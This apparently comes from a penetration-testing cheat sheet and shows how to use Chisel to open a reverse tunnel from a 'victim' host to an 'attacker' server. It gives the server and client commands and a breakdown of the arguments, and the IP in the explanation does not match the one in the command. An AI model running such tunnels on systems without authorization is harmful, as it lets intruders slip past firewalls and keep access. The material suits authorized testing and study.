Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.

We start by starting a chisel server on the attacker that will be listening on port 8000.

# Attacker
./chisel server -p 8000 --reverse

On the victim, we upload chisel binary and execute it in client mode. We follow this pattern to build our command: <local-host>:<local-port>:<remote-host>:<remote-port>

# Victim
.\chisel.exe client 10.10.10.10:8000 R:8888:localhost:8888

Explaining arguments:

• 10.10.16.6:8000 : attacker IP and the chisel server port

• R:8888:localhost:8888 :

  • R : indicate that we want to listen on the remote host (attacker)

  • 8888 : open a listener on port 8888 of the attacker

  • localhost : all traffic are forwarded to localhost... (victim)

  • 8888 : ... on port 8888 of the victim

This command will create a tunnel. This tunnel allows us to forward all traffic sending to port 8888 of attacker (my computer) to port 8888 of the victim.

Github: https://github.com/jpillora/chisel